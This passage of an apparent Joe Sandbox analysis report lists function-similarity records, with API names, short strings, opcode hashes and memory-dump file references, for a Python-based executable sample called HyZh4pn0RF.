                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-825057536
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7687b87dcfade708e71cb8af8033597d5e5aa7a4328c8a6f7437823f4d63887e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 415c02d097aa4b910430641c04d0515e20a1f1d7dce1a35d8b951bc4bbff3e6b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7687b87dcfade708e71cb8af8033597d5e5aa7a4328c8a6f7437823f4d63887e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75F03AE1E4790290DD06A77DDCA0164B371AB54760FA4A635C92D422B1EE5CE49A8300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                                                                                                  • String ID: reset
                                                                                                                                                                                                                                                                                                  • API String ID: 1069087923-1352515405
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
                                                                                                                                                                                                                                                                                                  • Instruction ID: d744022fe88ec3acadc8e492c51b5a4d5de16ca6500983c0a5f1535a56d7160c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F0B7E5E4B60680EF2A6BB9EC54264A3B0AF98B90F44F039CD2D463B59E2CE1458740
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArchaicUpperLowerPlugin' object attribute '_current_ascii_only' cannot be deleted$bool
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-1261582747
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c7019ae60389a316b38f34d8583e21c126b8065cf809baa2539fb2ca883be19
                                                                                                                                                                                                                                                                                                  • Instruction ID: f25c60fa356ad5fefea722d37234d34379872be8926ddd3f3c7bac35dafbb83c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7019ae60389a316b38f34d8583e21c126b8065cf809baa2539fb2ca883be19
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F05EE1E4790280DD06977DDCA01A4E771BB547A0FA4E235CE3C422F1EE1CE49AC300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _msizerealloc
                                                                                                                                                                                                                                                                                                  • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                                                                                  • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                                                                                                  • Opcode ID: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
                                                                                                                                                                                                                                                                                                  • Instruction ID: a56344e1338de6e996bbac33464592852824f404ada9ac5232f537e4123eeb98
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61E030A1B0A681C1EA168BA6F9444796264AF48FC4B045174DE0E1BB19DF2CD543CB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _PyObject_GC_New.PYTHON312(?,?,00000000,00007FFBAA462533), ref: 00007FFBAA4625C6
                                                                                                                                                                                                                                                                                                  • PyObject_GC_Track.PYTHON312(?,?,00000000,00007FFBAA462533), ref: 00007FFBAA4625F8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Object_$Track
                                                                                                                                                                                                                                                                                                  • String ID: 3.2.0
                                                                                                                                                                                                                                                                                                  • API String ID: 16854473-1786766648
                                                                                                                                                                                                                                                                                                  • Opcode ID: f91d149df4c654f8be0df0ef2da4b36c9d06b56ee9d54162962ccaca08fa2000
                                                                                                                                                                                                                                                                                                  • Instruction ID: 57007e9496327d4258958be2b1d40b8d69e383cab3d9290936b9c0229aab952d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f91d149df4c654f8be0df0ef2da4b36c9d06b56ee9d54162962ccaca08fa2000
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36E0E5A4E1BB02E2EB168B31E8440A863ACAF18F44B5401B9DD4D02320EF3CE1A6C361
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
                                                                                                                                                                                                                                                                                                  • Instruction ID: 41850fe4d4adb8c556590d97df6377909d807a04258cd3d8d3f17dd52a5c3992
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9091C3B2A0A646C2EA66CF36D40077A77A8FB46B90F044175EE4D47B89CF3CD452CB18